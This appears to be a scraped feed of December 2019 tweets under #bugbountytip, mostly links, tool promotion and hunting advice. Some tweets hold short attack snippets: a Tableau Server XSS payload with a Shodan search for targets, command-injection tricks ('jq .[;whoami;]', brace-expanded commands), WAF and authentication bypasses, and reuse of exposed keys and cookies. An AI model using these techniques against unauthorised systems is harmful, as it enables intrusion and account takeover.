noobSecurity
@noobsec_org


2019-12-16 07:17:12
6 https://t.co/7phSLNkWWL How we get $4000 in 5 minutes (Indonesian Language) #bugbounty #bugbountytip #bugbountytips #ittakesacrowd #togetherwehitharder
Laxmikant Bhumkar
@LuckyBhumkar


2019-12-16 00:09:51
0 Step by Step Bug Bounty by Nishant Saurav #bugbountytip https://t.co/0qTUn8I7Br
Elsadat ✪
@M0_SADAT


2019-12-15 00:38:20
3 I have submitted P1&P2 bugs more than 20 days ago and still no fix!! @santi_lopezz99 #bugbountytip PAY ME THEN DO THE DAMN FIX! #bugbountylife #bugbounty #hacking #infosec
Max
@0xw2w


2019-12-14 23:01:10
2 @Hacker0x01 my.anotherdomain\@anotherdomain.com - 500 error my.anotherdomain^@anotherdomain.com - 302, accepted If you see that there are errors & your redirect does not occur but there are hints that this could work in particular cases, don't give up and continue fuzzing! #bugbountytip #bugbounty
TheDelfX
@TheDelfX


2019-12-14 17:12:19
0 We are hackers. #hack #BugBounty #bugbountytip #software #hacking #hacker #hackerone https://t.co/29Q6mV643B
ghostlulz
@ghostlulz1337


2019-12-14 16:00:33
7 If you are serious about making a living doing bug bounties or working as a penetration tester you may want to get a copy of my latest book. 💰HUGE KNOWLEDGE DROP 💰 https://t.co/zJFRZjg5q2 #BugBounty #bugbountytip #bugbountytips #osint #infosec #redteam #hacking #pentest https://t.co/1TiV1v7Ipm
Nm Kannan 🇼🇳
@cybrsadist


2019-12-14 14:28:33
2 Useful video for n00b bug hunters => https://t.co/KbiKnOA4mg by @InsiderPhD #bugbountytip #bugbounty #infosec #penetrationtesting
bug bounty tips - Retweet
@BugbountytipsR


2019-12-14 14:09:20
0 Gr8 Blind SQLi tips BUGH/*$$$$*/UNTER - Insert comment b/w string, if response remains same then it is sqli Profile @gerben_javado WriteuP https://t.co/65svYcig2u Wonder Why @gerben_javado is not writing more blogs? #bugbountytip #bugbountytips
Sudoka
@sudo_sudoka


2019-12-14 08:05:24
1 Tableau Server #unauthenticated XSS, CVE-2019-19719, just visit: http://example[.]com/en/embeddedAuthRedirect.html?auth=javascript:alert("XSS") It's also an Open Redirect. #ThreatIntel #infosec #bugbounty #bugbountytip Let's search on Shodan: https://t.co/c4zhLFo9KK
ᮂ
@pouyana1


2019-12-14 06:53:55
0 sometimes you can rely on 'Last-Modified' header to recognize software version, useful for finding available public exploits. #bugbountytips #bugbounty #bugbountytip
Shantanu Kulkarni
@shantanukul_


2019-12-14 06:35:01
7 6k hackerone disclosed reports at one place. https://t.co/3Dod4cwLHj #hacking #pentesting #bugbounty #recon #pentest #infosec #cybersecurity #itsecurity #websecurity #appsec #hacker #security #Hackers #Android #Androidhacking #bugbountytips #bugbountytip #hackerone #bugcrowd
ᮂ
@pouyana1


2019-12-13 18:17:29
1 Use x-forwarded-for to bypass WAF ip based limitations. #bugbountytip #bugbounty #bugbountytips
€𝔔𝔭𝔩𝔬𝔩𝔱𝔠0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-13 04:06:34
0 Cross Site Request Forgery: Techniques https://t.co/3N7hAtbbFP #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil #certification #training #cybersecuritytraining
Selim Enes Karaduman
@Enesdex


2019-12-12 18:55:51
0 Always check for location.hash and location.href: if these js codes are going into any sink without encoding, it's DOM XSS. E.g. var hash = location.href .....innerHTML = hash #bugbountytip #bugbountytips #BugBounty
Pflash Punk
@PflashPunk


2019-12-12 18:48:25
0 I just published SSRF via FFmpeg HLS processing https://t.co/NISu4rr8Ik #bugbounty #bugbountytips #bugbountytip
Halil AHMAD
@Halilahmadd


2019-12-12 18:06:10
0 After a nice stored xss I prepared my report. I hope everything will be fine. #BugBounty #BugBountyTip #Hackerone @Hacker0x01 @GoogleVRP https://t.co/gEmljQEZd9
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍 揰鱹
@spyerror


2019-12-12 17:47:49
0 @Aksam funny, i think you are sleeping 😮 #BugBounty #BugBountyTip #WAF #infosec https://t.co/kExJ2STUK2
€𝔔𝔭𝔩𝔬𝔩𝔱𝔠0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-12 17:17:17
0 When the screens went black: How NotPetya taught Maersk to rely on resilience – not luck – to mitigate future cyber-attacks https://t.co/ECnt63vXqE #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil
YogoshaOfficial
@YogoshaOfficial


2019-12-12 14:15:14
3 [#bugbountytip] Found staging application that gives you access to a privileged account with default credz, make sure to reuse this domain cookies to the main domain (prod), you can easily access as privileged user. @TnMch_ & Get ready for #yogoshachristmaschallenge next monday !
bug bounty tips - Retweet
@BugbountytipsR


2019-12-12 13:56:24
0 TIP: IF you DON'T like the RESPONSE of SERVER, INTERCEPT RESPONSE, CHANGE IT, use BURP Changed Response to Bypass Authentication by John Simon Profile https://t.co/m6mB5kZ7lh WriteuP https://t.co/K1SbMWjDfq #bugbountytip #bugbountytips #writeup #hacking
Zero Xyele
@zeroxyele


2019-12-12 11:59:11
0 I released new tool for extracting api keys and secrets. https://t.co/YqD2Cac6iy #bugbounty #bugbountytip #bugbountytips #hackerone #hacker101 #bugcrowd https://t.co/jzAuhGY7b8
Sunil
@Sunilkande1137


2019-12-12 06:16:33
1 Recon Resources https://t.co/W7NLDe4PNJ https://t.co/xj3JvFgojf https://t.co/Gx4sx1ZoPM https://t.co/gFAXmz3t34 #hacking #pentesting #bugbounty #recon #pentest #infosec #cybersecurity #ITsecurity #websecurity #appsec #hacker #security #Hackers #bugbountytips #bugbountytip
Mashoud1122
@mashoud1122


2019-12-12 04:17:01
1 Command exec in JQ cat file.json | jq .[;whoami;] returns error with command executed. #bugbountytip #bugbountytips #BugBounty #infosec #Security
Sunil
@Sunilkande1137


2019-12-12 01:25:04
4 6000 hackerone disclosed reports at one place. https://t.co/bxvXpnVitp #hacking #pentesting #bugbounty #recon #pentest #infosec #cybersecurity #itsecurity #websecurity #appsec #hacker #security #Hackers #Android #Androidhacking #bugbountytips #bugbountytip #hackerone
Vishnu Vardhan Gadupudi
@vishu10x00


2019-12-11 20:11:29
0 @idontkn85445458 @Dondata4 - As this is a post based you need to create a html csrf to trigger xss. - Just use burpsuite CSRF generator. - Save it as .html file. - Open the .html file it triggers XSSđŸŽ‰ïž #bugbountytip
Sunil
@Sunilkande1137


2019-12-11 19:13:07
3 6000 hackerone disclosed reports at one place. https://t.co/bxvXpnVitp #hacking #pentesting #bugbounty #recon #pentest #infosec #cybersecurity #itsecurity #websecurity #appsec #hacker #security #Hackers #Android #Androidhacking #bugbountytips #bugbountytip #hackerone
bug bounty tips - Retweet
@BugbountytipsR


2019-12-11 14:18:36
0 Use this link https://t.co/MWpV7kbFdO #bugbountytip #bugbountytips https://t.co/2suoUC9DK3
Tragger Osbourne🧐
@OsbourneTragger


2019-12-11 13:52:31
0 We all know @bishopfox is a team full of slayers. Be sure to check out their latest write up where they identified 9 vulnerabilities in the Solishmed app #bugbounty #bugbountytip #bugbountytips #infosec #redteam #osint https://t.co/sNVecQJVRj
Vishnu Vardhan Gadupudi
@vishu10x00


2019-12-11 13:39:36
0 Escalate CRLF to RCE, I got this chain in my dreams⛷, i think it won't, at least not very often :P #bugbountytip CRLF -> X-HTTP-Method-overide:PUT -> Shell
bug bounty tips - Retweet
@BugbountytipsR


2019-12-11 12:56:47
1 XSS is like evil God who is everywhere Xss Hunter @AnasIsHere Xss Like Pro at https://t.co/a47iwf9j9f #bugbountytips #bugbounty #bugbountytip #hacking #writeup #xss
ghostlulz
@ghostlulz1337


2019-12-11 12:46:24
3 Everyone knows @bishopfox is a team full of slayers. Be sure to check out their latest write up where they identified 9 vulnerabilities in the Solishmed application. https://t.co/OtxduAPoSM #bugbounty #bugbountytip #bugbountytips #infosec #redteam #osint
D Ξ Ξ P Λ K ⚙
@Deepak_maxx


2019-12-11 12:43:40
0 If you got 10 stored XSS on the same application! How would you report it and why? I'm sure everyone will have their own opinions & experiences regarding this! #bugbounty #bugbountytips #bugbountytip
ZracheSs-AnasZ
@ZrariAnas


2019-12-11 08:12:03
0 If you didn’t already subscribe to @spaceraccoonsec blog posts! Go now, do it.. Come on, don’t question reason, just do it. Trust me, you’ll like it. I love you and you love me, then go do it. Subscribe, it’s free... No reason not to. Stop reading already!!??? #bugbountytip https://t.co/A7MeCBTLaA https://t.co/IGbatoBAAM
bug bounty tips - Retweet
@BugbountytipsR


2019-12-11 03:59:08
0 Beginners miss to chk source code for XSS and they never find out that it is easy #easy #bugbountytip #bugbountytips #hacking https://t.co/QM6gs3Ijpi
Sajjad Arshad
@sajjadium


2019-12-11 03:34:14
0 @USENIXSecurity @fransrosen @dawidczagan @orange_8361 @irsdl @garethheyes @NahamSec @ldionmarcil @nj_dav @jobertabma check out new ways of exploiting #WebCacheDeception using #PathConfusion techniques! #togetherwehitharder #bugbounty #bugbountytip #bugbountytips @Hacker0x01 @TheHackersNews
Ammar AmerđŸ‡žđŸ‡Ÿ
@cry__pto


2019-12-10 17:34:59
5 -List of some Penetration Testing Tools.pdf: https://t.co/sN2lkjt1Uh -In Plain Sight:1: Vulnhub Walkthrough.pdf: https://t.co/F2zf4eJK6n -A cheat-sheet for password crackers.pdf https://t.co/XQQxCJ99wQ #bugbountytip #redteam #PenTest #Hacking #cybersecurity #BugBounty #OSINT
Mourad
@SecuAudit


2019-12-10 15:56:36
0 I reported a critical bug in a 3rd party website. Company confirmed that this is critical even if it is out of scope, HackerOne Staff despite this insists that this is not critical and updated the severity from Critical to Medium #750138 #BugBounty #bugbountytip @Hacker0x01 😟
0day work
@0daywork


2019-12-10 15:53:28
1 #Bugbountytip Look for #API keys in the documentation or screenshots of blog posts. Sometimes those are *not* (entirely) redacted and still valid employee's credentials, giving you access to some juicy endpoints ;-) #Bugbounty #OWASP #ITSecurity https://t.co/V91tslWu3Y
Skyper đŸ’»
@SkypLabs


2019-12-10 00:33:05
2 Get the #ASN of a company: https://t.co/pi8II54BuN #Security #Hacking #BugBounty #BugBountyTip #BugBountyTips #Shodan
Alessandro Brucato
@_brucedh


2019-12-09 17:17:36
0 Any idea how to trigger an XSS into the body of a 301 redirect? @s0md3v @uraniumhacker @iamnoooob @brutelogic #bugbountytip https://t.co/dmW1q4hwTv
€𝔔𝔭𝔩𝔬𝔩𝔱𝔠0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-09 16:21:04
4 🏆🏆Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/4iR3cX3qyf
intigriti
@intigriti


2019-12-09 13:08:32
12 Did you know you can use OpenSSL for recon purposes? 🔒😏 Thanks for the #BugBountyTip, @michael1026h1! https://t.co/mRraH8cK2z
Mohammed Shine
@MohammedShine8


2019-12-09 11:44:16
6 Got stuck with spaces in command Injection? Use {} to eliminate spaces while using commands. Eg: {ping,127.0.0.1} {ip,addr} {ls,-al} #bugbounty #bugbountytip #infosec #commandinjection #cmdi #vapt #hacker
dark_warlord14
@dark_warlord14


2019-12-09 11:42:17
1 Opened a web page on Firefox and left to get coffee. Came back in a minute to find that sweet XSS popup by @knoxss_me just lying there. @brutelogic will amaze you every time. #bugbountytip Try @knoxss_me and save time looking for XSS manually. https://t.co/4ppKTLDCeN
€𝔔𝔭𝔩𝔬𝔩𝔱𝔠0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-09 08:47:33
0 💰Keep Following Us 💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil #certification #hackerone https://t.co/DwvuqYv30k
€𝔔𝔭𝔩𝔬𝔩𝔱𝔠0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-09 08:43:54
0 True Story When Hacking the Neighbourhood WiFi — Tutorial Coming Soon 💰💰 Keep Following Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops https://t.co/P5VyKxUU81
€𝔔𝔭𝔩𝔬𝔩𝔱𝔠0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-09 08:41:28
0 HOF Coming Soon! Keep Following! Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil https://t.co/3GBqgjOgP4
robre
@_robre


2019-12-09 00:43:25
0 Create your own wordlists and be creative with them. If you’re just using seclists like everyone else, you will only find what everyone else is finding. #bugbountytip #bugbountytips
Rafin Rahman Chy
@rafinrahmanchy


2019-12-08 18:15:45
3 Information Gathering Methodologies *Social Engineering *Doxing *OSINT *Advanced Google Search/Google Hacking *DNS Enumeration *Internet Archive *Dumpster Diving #CyberSecurity #InfoSec #EthicalHacking #EthicalHacker #Hacking #Hacker #Pentesting #Recon #BugBounty #bugbountytip https://t.co/bVcvwskY8a
Tragger Osbourne
@OsbourneTragger


2019-12-08 15:06:59
0 Firebase database: it’s one of the easier wins for #BugBoundy. You can easily look for it on Google using Site:.firebaseio.com/.json, but Google doesn’t give you results; if you use Bing you can get results. Google knows the problem #togetherwehitharder #BugBounty #bugbountytip https://t.co/fMSc8J6lM1
Rafin Rahman Chy
@rafinrahmanchy


2019-12-08 15:01:12
11 The best guideline to become an Ethical Hacker I've ever read https://t.co/BMrOc4hH51 #CyberSecurity #InfoSec #infosecjobs #InfoSecurity #ITSecurity #EthicalHacking #EthicalHacker #Hacking #Hacker #Hackers #WhiteHat #BugBounty #bugbountytip #bugbountytips #Pentesting #Pentester
€𝔔𝔭𝔩𝔬𝔩𝔱𝔠0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-08 10:21:34
0 Ginp - A malware patchwork borrowing from Anubis Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting https://t.co/AzgReUIeLf
€𝔔𝔭𝔩𝔬𝔩𝔱𝔠0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-08 10:15:48
0 Breaking Mimblewimble’s Privacy Model Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops https://t.co/5gDbIPnmFH
€𝔔𝔭𝔩𝔬𝔩𝔱𝔠0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-08 10:07:55
2 Free Giveaway -- Free Programming Ebooks Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops https://t.co/7kp48r2kcA
€𝔔𝔭𝔩𝔬𝔩𝔱𝔠0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-08 10:00:40
3 Introducing Flan Scan: Cloudflare’s Lightweight Network Vulnerability Scanner -- Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 https://t.co/OSiQlEhTHi #BugBounty #BugBountyTip #bugbountytips
Terminal Jockey
@TerminalJockey


2019-12-08 04:03:53
1 I wrote a tool to help me learn bash! Simple script to do a little dns enum then crawls results for dirs found in the robots.txt file. Will be adding functionality, open to critique! https://t.co/PmlCbFedDE #bugbounty #infosec #ctf #bugbountytips #bugbountytip
Ammar AmerđŸ‡žđŸ‡Ÿ
@cry__pto


2019-12-07 23:54:02
2 I have finished building my github repository which talks about #OSINT. A very important repository for ethical hackers and #BugBounty hunters and of course #OSINT lovers. The repository for now contains 100 tips and it will get daily updates https://t.co/gNMSDGULS6 #bugbountytip
Samet ƞAHİN
@sametsahinnet


2019-12-07 18:14:21
2 Here is a blog and trick about : "Javascript File Inclusion via a Simple Link Injection" #bugbountytip : Even a Simple Link Injection can be very harmful. Depends on where it is. https://t.co/TcOpslYuvE https://t.co/ks5NJDD3ss
Zero Xyele
@zeroxyele


2019-12-07 12:28:31
0 I Got URLs https://t.co/K5qmVWfEs0 #hackerone #hacker101 #bugbounty #bugbountytips #bugbountytip #bugcrowd https://t.co/X7J2nk2dyz
xaeroborg
@xaeroborg


2019-12-07 12:09:05
0 resource #bugbountytips #bugbountytip https://t.co/kSxeWPYqWe
Hendrik
@hendrikvb


2019-12-07 07:11:49
0 #bugbountytip Add #corsy to your #CSRF recon, complement with #bolt, both by @s0md3v. #bugbounty #Pentesting
ghostlulz
@ghostlulz1337


2019-12-07 01:52:08
1 Most hunters freeze up when they get a piece of source code to analyze. Source code analysis can help you find a lot of bugs which are missed by black box style testing. Don't miss easy XSS. More info in my blog: https://t.co/Ke274Lvc9e #BugBounty #bugbountytips #bugbountytip https://t.co/E1XFw9H9Nc
ghostlulz
@ghostlulz1337


2019-12-06 20:40:05
10 If you're looking to make money bug bounty hunting you may want to get a copy of my book. Nothing is better than getting paid to do what you love! https://t.co/Z1FwTfiskG #BugBounty #bugbountytips #bugbountytip #infosec #appsec #osint #xss #pentest #redteam #cybersecurity https://t.co/CSTWdrUaD2
CyberTheReapeR☹
@CyberTheReapeR5


2019-12-06 20:39:18
1 what is xss payload for akamai waf bypass?? #hackerone #bugcrowd #infosec #bugbountytips #bugbountytip #xss #hacking
dos_kid
@kid_dos


2019-12-06 18:12:15
0 #bugbountytip Look twice before submitting reports especially for Information disclosures 😓
bugbountytip
@a_l_e_r_t_1_


2019-12-06 09:12:09
1 (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby https://t.co/amLbKREucw
€𝔔𝔭𝔩𝔬𝔩𝔱𝔠0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-06 06:03:58
6 Type of Cyber Attacks 🩞 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/MZpyBpq6C4
Ammar AmerđŸ‡žđŸ‡Ÿ
@cry__pto


2019-12-06 03:06:03
6 -Windows Notes + Cheatsheet.pdf: https://t.co/lVxi7uImty -Windows Privilege Escalation Fundamentals.pdf: https://t.co/raueoqhVVH -Linux Notes + Cheatsheet.pdf: https://t.co/rrdCBWkbOT -Docker for Pentesters.pdf: https://t.co/Wl6qXHe6XI #bugbountytip #redteam #PenTest #Hacking
bayani elogada
@metamudkip


2019-12-06 02:14:16
0 If you're discouraged from joining unrewarding bug bounty programs, listen to @JessieJ: "We're paying with love tonight." #bugbounty #bugbountytip
fadetoblack
@hardweired


2019-12-05 19:59:55
0 If you're Testing for SSRF or blind XXE and it should take time to be executed or Invalidated redirections to steal tokens : https://t.co/uHMg4rJD69 This tool is awesome to Test for those kinds of bugs #bugbountytips #bugbountytip https://t.co/efC5pv0SZ4
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-12-05 18:43:44
0 Is there anything more beautiful than this in bug bounty #bugbounty #bugbountytip thanks @h1_sp1d3r @hakluke @stokfredrik @Rhynorater https://t.co/z6iavoWzgc
გოჩა ოჄრაძე (Gocha Okradze)
@GochaOqradze


2019-12-05 16:25:09
1 #bugbountytip Detect Unix Command injection Payloads: https://t.co/Jz35dKi8KS Detect in response: regexp for burp suite. https://t.co/J0bS7ViC9C And 30 second delay. It is all.
€𝔔𝔭𝔩𝔬𝔩𝔱𝔠0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-05 14:17:45
0 OnePlus #Breached Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/VVsLLbfvum
€𝔔𝔭𝔩𝔬𝔩𝔱𝔠0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-05 14:14:39
1 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/yJGb5KrEnU
€𝔔𝔭𝔩𝔬𝔩𝔱𝔠0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-05 14:14:21
0 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/mzFcIOkL8E
Rafin Rahman Chy
@rafinrahmanchy


2019-12-05 13:24:00
1 Facebook Bug Bounty Blogs/WriteUps : https://t.co/CKdsEXouCz https://t.co/rzoYk67VS6 https://t.co/xeQiLCoQbM https://t.co/7y70R706W1 https://t.co/E96wwBPfc6 https://t.co/hfAsZqb9tI https://t.co/ZxPANapI5l https://t.co/SJGiC0xChE https://t.co/d57e8Seq9m #BugBounty #bugbountytip https://t.co/L02NnprDQB
Anas Mahmood đŸ‡”đŸ‡°
@AnasIsHere


2019-12-05 12:28:29
6 #XSS like a Pro 😎 Just published another interesting writeup. Must read the full blog post Writeup: https://t.co/HlXk9esUv3 #BugBounty #BugBountyTip #Hacking #vulnerability
TvM
@tvmpt


2019-12-05 12:12:22
0 Quick and dirty way to import a big url list into burpsuite cat file | parallel -j 200 curl -L -o /dev/null {} -x 127.0.0.1:8080 -k -s #quickanddirtytip #bugbountytip #oneliner #bugbountytips
€𝔔𝔭𝔩𝔬𝔩𝔱𝔠0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-05 09:14:20
7 Cross Site Scripting Basics - #XSS https://t.co/0wdvBhdOHw Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity
€𝔔𝔭𝔩𝔬𝔩𝔱𝔠0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-05 09:06:33
0 >> kali-undercover To Start #UNDERCOVER Mode in Kali 2019.4 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/F5IhdmmCzF
€𝔔𝔭𝔩𝔬𝔩𝔱𝔠0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-05 09:04:28
0 Update Your Kali and Get the Kali Undercover mode that looks like Windows OS ! Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops https://t.co/o7JrVLrhGx
€𝔔𝔭𝔩𝔬𝔩𝔱𝔠0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-05 09:01:35
0 PyXie Rat - Python Rat to Escalate Windows Permissions Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/eFwqj2ozDj
bugbountytip
@a_l_e_r_t_1_


2019-12-05 08:29:09
0 6 download for 50 + . GOOD HACKING !!! #bugbountytips #bugbountytip
Ajay Gautam
@evilboyajay


2019-12-05 07:06:04
4 I discovered a new kind of web application authentication bypass by accident while doing pentest and thought of sharing with you all <3 #infosecmatters #ethicalhacking #informationsecurity #cybersecurity #infosec #bugbountytip https://t.co/cFnTkaEFG2
ph0rensic
@ph0rensic


2019-12-05 01:15:20
0 I received $ 900 in a private program Hackerone! There is still time to hit the goal! I needed some arguments with the evaluator, always research what you're debating! https://t.co/TDQWkEfNMq #BugBounty #bugbountytip
გოჩა ოჄრაძე (Gocha Okradze)
@GochaOqradze


2019-12-05 00:30:46
0 #bugbountytip 99.99% of xss on public programs is duplicates I got it
robre
@_robre


2019-12-04 21:06:25
1 @NathOnSecurity Hey little tip: open two windows of acunetix, double your income. #bugbountytip
@cr33pb0y
@theyiyibest


2019-12-04 20:05:09
0 Yay, I was awarded a 4 x $X00 bounty on @Hacker0x01! https://t.co/7vrkzfnbNA #TogetherWeHitHarder Recipe to this one: - Google Dorks - XSS reflected - Repeat first step. #bugbounty #bugbountyprogram #bugbountytip
€𝔔𝔭𝔩𝔬𝔩𝔱𝔠0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-04 18:58:36
0 Maximise Bug Bounty Scope - Gather Subdomains using Facebook Certificate Transparency https://t.co/AjSRBqt57p #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil #certification #hackerone
intigriti
@intigriti


2019-12-04 15:47:09
9 ⚠Open staging environments can lead to production account takeover ✔If they use a separate DB, but same JWT secret ✔If the username or e-mail address is used as identifier This is an excellent #BugBountyTip, thanks @kapytein! https://t.co/yZkBoDBO1d
Tragger Osbourne
@OsbourneTragger


2019-12-04 15:24:58
0 apps, I realized after reverse engineering, using a tool like apktool, I was able to look at the AndroidManifest to see all permissions, which often lead to stringxml where I would find content delivery, login ID & pass, fB tokens, googleapi, #bugbountytips #bugbountytip #togetherwehitharder https://t.co/ZBq3acOAoI
გოჩა ოჄრაძე (Gocha Okradze)
@GochaOqradze


2019-12-04 12:19:07
1 #bugbountytip All in one for Bug Bounty Hunters and pentesters https://t.co/lRPVHMHKAo
Ammar AmerđŸ‡žđŸ‡Ÿ
@cry__pto


2019-12-04 00:37:38
3 -Pen-testing resources.pdf: https://t.co/eykvQfDT5g -Shellcode: Encrypting traffic.pdf: https://t.co/QMsNonNYPZ -huge list of pentest tookit.pdf: https://t.co/LM0XUQb2AI -Information Gathering with theHarvester.pdf: https://t.co/ZFWOVqotm6 #bugbountytip #Hacking #osint #redteam
Tragger Osbourne
@OsbourneTragger


2019-12-03 22:31:18
0 I just find a bug 🐜 on android app Using firebase, I use apktool Then I look for AndroidManifest.xml, I found firebase there, I look for address in string.xml, I found firebase database and api keys 🔑 #bugbountytip #bugbountytips #togetherwehitharder
ᮂ
@pouyana1


2019-12-03 21:55:59
3 Of course that James Kettle articles are something else. @albinowax https://t.co/nsTQZFfzMX #bugbountytip #infosecurity #Security #websecurity
haxor_raheem
@HaxorRaheem


2019-12-03 18:31:52
1 Anyone know how to inject a "href" payload in "h1" payload . @Bugcrowd @Hacker0x01 #bugbountytip
ghostlulz
@ghostlulz1337


2019-12-03 18:26:53
9 Exposed Log Files - https://t.co/Kft6p37wJM Exposed Firebase DB - https://t.co/WGzatNLO3C Exposed Github Passwords- https://t.co/sGVY9UloQQ Hacking GraphQL - https://t.co/Z4ZBm3bN82 XSS SVG - https://t.co/5k3dGwkaGA #BugBounty #bugbountytips #bugbountytip #infosec #osint
Sebastian Wieseler
@kickino


2019-12-03 15:30:20
2 Controversial #bugbountytip Schedule meetings with (defence) vendors and learn about their techniques and technologies. Engage with them during product demos and establish a deeper understanding of their products. You can also use “blue” knowledge for “red” approaches or #bugbounty
ᮂ
@pouyana1


2019-12-03 09:42:57
0 bugbounty tips : find hidden HTTP headers and inject them, simple way to reach high risk bugs. #BugBounty #bugbountytips #bugbountytip
Shaurya Sharma
@ShauryaSharma05


2019-12-03 08:39:35
0 I just finished writing a blog and it's a great read for those who are trying their luck in bug bounty "Haven’t founded any bounties yet? Hunt for these vulnerabilities in web applications for a better bounty!" https://t.co/NRSjy03JN5 #bugbounty #hacking #bugbountytip
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-12-03 08:28:35
0 #bugbountytip find open prod marathon instances in shodan. - “X-Marathon-Leader” - “ssl:Redacted” “X-Marathon-Leader”
soon
@soon73564093


2019-12-03 06:32:33
1 Bingo xss <3 #bugbounty #bugbountytip https://t.co/d6FilP9MWs
Shoeb Patel
@0xCaptainFreak


2019-12-03 04:08:04
0 I constantly take time out of App Security and learn something else to keep things interesting. System Design and Competitive programming interest me a lot. 1. https://t.co/SpMqOJ40sE 2. https://t.co/hhWuOhB85V #bugbountytips #bugbountytip
SerWaf
@serialwaffle


2019-12-03 02:24:57
0 Can someone explain to me how the directories work in #hackerone? If I understand correctly, all of the directories are fair game (if I stick to the in-scope items of course). Can I just pick a Co. and start hunting??? #bugbounty #bugbountytip @Hacker0x01
Sanketh Sharath
@sharathsanketh


2019-12-03 02:18:19
2 Web application architecture: Principles, protocols and practices by Shklar & Rosen seems to be a great book! It's doing a world of good to me in making me understand how web apps work. Definitely recommended for those getting into bugbounty #bugbountytips #bugbounty #bugbountytip
sudo ls /usr/local/protected 🔮
@AbdulConsole


2019-12-02 23:50:45
0 You don’t want to look at the website from a bird’s eye view and find low hanging fruit i.e, security vulnerabilities without any serious impact. #bughunting #bugbountytip #bugbountytips
Avanish Pathak
@avanish46


2019-12-02 18:33:32
0 Short Note On The $3000 XSS Found On the Public Program on @Bugcrowd #bugbountytip #bugbounty https://t.co/Avh1EW66KA https://t.co/Ef7EW6LwSg
